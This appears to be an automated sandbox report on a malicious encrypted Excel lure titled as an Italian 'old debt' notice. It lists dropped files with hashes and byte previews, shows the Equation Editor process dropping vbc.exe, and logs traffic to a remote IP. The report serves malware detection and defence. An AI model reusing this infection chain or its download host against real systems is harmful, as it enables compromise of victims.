                                      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\974DCA88.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):5396
                                      Entropy (8bit):7.915293088075047
                                      Encrypted:false
                                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                      Malicious:false
                                      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0578845.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                      Category:dropped
                                      Size (bytes):11303
                                      Entropy (8bit):7.909402464702408
                                      Encrypted:false
                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                      Malicious:false
                                      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC1E237C.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                      Category:dropped
                                      Size (bytes):2647
                                      Entropy (8bit):7.8900124483490135
                                      Encrypted:false
                                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                      Malicious:false
                                      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E50395A7.emf

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                      Category:dropped
                                      Size (bytes):1099960
                                      Entropy (8bit):2.0152927993710406
                                      Encrypted:false
                                      SSDEEP:3072:rXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:xahIFdyiaT2qtXl
                                      MD5:3B852D8358853D18EC743B391C9B5CB9
                                      SHA1:482C62E96B952BA7C1D7588CC7060C24A119C6E8
                                      SHA-256:6547FE0558499D5817F3BBEE013431FA9CB633D2417812FBFB8DFE9C44752AE7
                                      SHA-512:A0F210147138BEE91116BEDD9BD7FF84CC08A290D67AFD6587AA39EE47F0BFC6266804D495092BD38FD683EB68D9EB38A13533EBD0970900141A001DCD7C1957
                                      Malicious:false
                                      Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................\V$...8.o..ffV.@..%.....o.X.o.......o.<.o.RQ.W..o...o.....$.o...o.$Q.W..o...o. ...IdfV..o...o. ............dfV............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........H.o.X.....o...o..8^V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA49F3DF.jpeg

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                      Category:dropped
                                      Size (bytes):4396
                                      Entropy (8bit):7.884233298494423
                                      Encrypted:false
                                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                      Malicious:false
                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                                      C:\Users\user\AppData\Local\Temp\~DF0F29F80801BE30A4.TMP

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\~DF4803FEB401DB7C3E.TMP

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\~DF89B48201BCEFC563.TMP

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:CDFV2 Encrypted
                                      Category:dropped
                                      Size (bytes):191608
                                      Entropy (8bit):7.957255959982603
                                      Encrypted:false
                                      SSDEEP:3072:Ir7+tIJDlgnSWHOctpq0nP0FaLOUdFPpuFMjwXnJdQVtS/ckp33mCNEg9VKgh:uiIJQbS+FozXLmwh
                                      MD5:3ECCA47C8FD3D3FE23E3DE46298B346C
                                      SHA1:0BED1382DA7FFEAF9AA0AA28E9143CFFC0EC606D
                                      SHA-256:6F401D7546FC2BD85B659A1D30A89BF21451E327E2712AB86F1A3DEC421B7E64
                                      SHA-512:535050E8FC49E158F292F802BCCBC2A12FBBF1A48FF77182AB33F70425161862D623B50D4BA8A0A9818D4922601D02830D00F5723BC819B4F3131012482DAEE2
                                      Malicious:false
                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                      C:\Users\user\AppData\Local\Temp\~DFFC2F894EABD35FFF.TMP

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\Desktop\~$Vecchio debito_SKTGH_465585484754.xlsx

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):165
                                      Entropy (8bit):1.4377382811115937
                                      Encrypted:false
                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                      Malicious:true
                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                      C:\Users\Public\vbc.exe

                                      Download File
                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):796672
                                      Entropy (8bit):6.405321787421746
                                      Encrypted:false
                                      SSDEEP:12288:wvEQ0OQo9yMBQXttUEHBZwxDn0876BblOyGNaS0ZXub:uj0zocjgEHoHoA4SWX
                                      MD5:A8F58E851A89075EE8AB92E5CB6A776C
                                      SHA1:DFAD7B60B5A3370700F32D20E35967EE60E859F6
                                      SHA-256:C9E510166EE89B61B67CC0646C60422E7F9C7D8C05101ECB2552D3EAB87DE758
                                      SHA-512:C14B600C8E7399291E8D104AE192603C6D25D063AD6A610E1F5AFAF708E08377FB8B17B9FBBAFC154FE071D31C170E7FE21F27F406A828C75B32426F2AAA7FE0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a............................^8... ...@....@.. ....................................@..................................8..K....`...............................7............................................... ............... ..H............text...d.... ...................... ..`.sdata.......@......................@....rsrc........`....... ..............@..@.reloc...............&..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:CDFV2 Encrypted
                                      Entropy (8bit):7.957255959982603
                                      TrID:
                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                      File name:Vecchio debito_SKTGH_465585484754.xlsx
                                      File size:191608
                                      MD5:3ecca47c8fd3d3fe23e3de46298b346c
                                      SHA1:0bed1382da7ffeaf9aa0aa28e9143cffc0ec606d
                                      SHA256:6f401d7546fc2bd85b659a1d30a89bf21451e327e2712ab86f1a3dec421b7e64
                                      SHA512:535050e8fc49e158f292f802bccbc2a12fbbf1a48ff77182ab33f70425161862d623b50d4ba8a0a9818d4922601d02830d00f5723bc819b4f3131012482daee2
                                      SSDEEP:3072:Ir7+tIJDlgnSWHOctpq0nP0FaLOUdFPpuFMjwXnJdQVtS/ckp33mCNEg9VKgh:uiIJQbS+FozXLmwh
                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:e4e2aa8aa4b4bcb4

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 28, 2022 22:47:31.053697109 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:31.331160069 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.331291914 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:31.331645012 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:31.609735012 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.609756947 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.609772921 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.609790087 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.609831095 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:31.609883070 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:31.888665915 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888710976 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888725996 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888739109 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888752937 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888765097 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888777971 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888796091 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:31.888870001 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:31.889959097 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.165982008 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166014910 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166032076 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166050911 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166066885 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166084051 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166099072 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166115999 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166132927 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166131973 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.166148901 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166183949 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.166213036 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.166515112 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166548014 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166563034 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166591883 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.166594982 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.166620970 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.166693926 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.168880939 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444075108 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444119930 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444139004 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444155931 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444174051 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444190025 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444206953 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444226980 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444247961 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444267988 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444283962 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444298029 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444314957 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444320917 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444333076 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444355965 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444358110 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444363117 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444376945 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444377899 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444390059 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444401026 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444407940 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444423914 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444441080 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444444895 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444461107 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444463015 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444482088 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444499016 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444734097 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444758892 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444777966 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444796085 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444803953 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444816113 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444819927 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444832087 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444843054 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444853067 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444866896 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444883108 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444890022 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.444907904 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.444926023 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.447468042 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721539974 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721575022 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721587896 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721607924 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721626043 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721642017 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721659899 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721677065 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721693993 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721709967 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721725941 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721743107 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721760035 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721776009 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721775055 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721793890 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721807003 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721812010 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721812963 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721829891 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721831083 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721867085 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721882105 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721888065 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721889019 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721904993 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721910000 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721924067 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721926928 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721942902 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721942902 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721956968 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721962929 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721973896 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.721982002 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:32.721991062 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:32.722002029 CET8049165103.167.92.57192.168.2.22
